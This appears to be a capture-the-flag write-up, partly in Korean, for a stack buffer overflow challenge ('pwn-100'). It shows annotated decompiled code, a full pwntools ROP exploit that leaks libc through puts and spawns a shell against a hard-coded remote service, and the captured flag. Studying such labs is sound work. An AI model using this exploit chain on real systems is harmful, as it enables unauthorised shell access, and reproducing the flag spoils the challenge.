-
Disassembly 디스어셈블리
/* Entry point of the target binary (decompiler output).
 * Turns off stdio buffering on stdin/stdout and then calls do(), which is
 * the only routine here that consumes user input (via _read). */
undefined8 main() {
    setbuf(_reloc.stdin, 0);
    setbuf(_reloc.stdout, 0);
    do();
    return 0;
}
/* Reads user input into a stack slot at rbp-0x40, then prints "bye~".
 * Defect: _read is told to store 200 bytes, but only 0x40 (64) bytes lie
 * between var_40h and the saved frame pointer, so the write runs past the
 * variable, over the saved rbp and into the return address -- the stack
 * buffer overflow described in the writeup. The read length must be bounded
 * by the destination's actual size, not a fixed constant. */
void do() {
    int64_t var_40h; // rbp-0x40
    _read(&var_40h, 200);
    puts("bye~");
    return;
}
/* Reads exactly `size` bytes from stdin (fd 0) into addr, one byte per call.
 * `size` is fully caller-controlled and unrelated to the destination's
 * capacity, so this helper is only as safe as each caller's argument
 * (do() passes 200 for an 8-byte slot). The return value of read() is
 * discarded, so EOF and errors go unnoticed and the loop keeps issuing
 * reads until the count is reached. */
void _read(void *addr, undefined8 size) {
    for (int i = 0; i < size; i++) {
        read(0, addr + i, 1);
    }
    return;
}
do에서 _read를 호출해 rbp-0x40에 200바이트만큼 입력받아 스택 버퍼 오버플로우가 발생한다.
Return Oriented Programming
puts를 이용해 라이브러리 버전을 구한 다음 system("/bin/sh")를 호출하면 문제를 해결할 수 있다.
Code
from pwn import *

# Target binary, the libc build assumed to match the remote service, and the
# remote endpoint. If the libc file does not match the remote's version the
# offsets computed below are wrong and the second stage fails.
binary = "./pwn-100"
lib = "../../lib/libc6_2.23-0ubuntu11_amd64.so"
server = "111.200.241.244"
port = 56580

# context.log_level = 'debug'
context.binary = binary

# Hard-coded toggle: remote run vs. local run under gdb with the given debug
# symbol directory.
if True:
    p = remote(server, port)
else:
    p = gdb.debug([binary], gdbscript = 'set debug-file-directory ./x86_64-linux-gnu')

e = ELF(binary)
r = ROP(e)
l = ELF(lib)
e.checksec()  # output is only printed, not checked by the script

# Addresses taken from the binary itself. `do` is a fixed absolute address,
# which presumably means the binary is loaded at a constant base (no PIE) --
# confirm against the checksec output.
prdi = r.find_gadget(['pop rdi', 'ret'])[0]
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
setbuf_got = e.got["setbuf"]  # looked up but never used below
do = 0x40068e

# Stage 1: 0x48 bytes of filler = 0x40 (distance from var_40h to the saved
# rbp, per the disassembly) + 8 (saved rbp); the next 8 bytes replace the
# return address. The chain calls puts(puts_got) to print the resolved libc
# address of puts, then returns into do() so a second input can be sent.
payload = b"\x90"*0x48
payload += p64(prdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(do)
# _read consumes exactly 200 bytes, so the payload is padded to that length;
# a shorter send would leave the program blocked waiting for more input.
payload += b"\x90"*(200-len(payload))
p.send(payload)
p.recvline()  # discard the "bye~" line printed by do() before the chain runs

# The leaked pointer arrives as raw bytes with trailing NULs stripped by the
# line read; pad back to 8 bytes before decoding.
puts = u64(p.recvline().strip().ljust(8, b"\x00"))
# libc base = runtime address of puts minus its offset in the libc file.
libc = puts - l.symbols["puts"]
log.info("libc : " + hex(libc))
binsh = libc + next(l.search(b"/bin/sh\x00"))
system = libc + l.symbols["system"]

# Stage 2: same frame layout, now calling system("/bin/sh") with the
# addresses derived from the leak. Both stages depend on the return address
# being reachable from the overflow without a canary in between; a stack
# canary, PIE, or a non-writable/unreadable GOT would each break a step
# (checksec output is not shown on this page).
payload = b"\x90"*0x48
payload += p64(prdi)
payload += p64(binsh)
payload += p64(system)
payload += b"\x90"*(200-len(payload))
p.send(payload)
p.interactive()
Flag
cyberpeace{e8a8c2e39962c4cd00fde674e17d6886}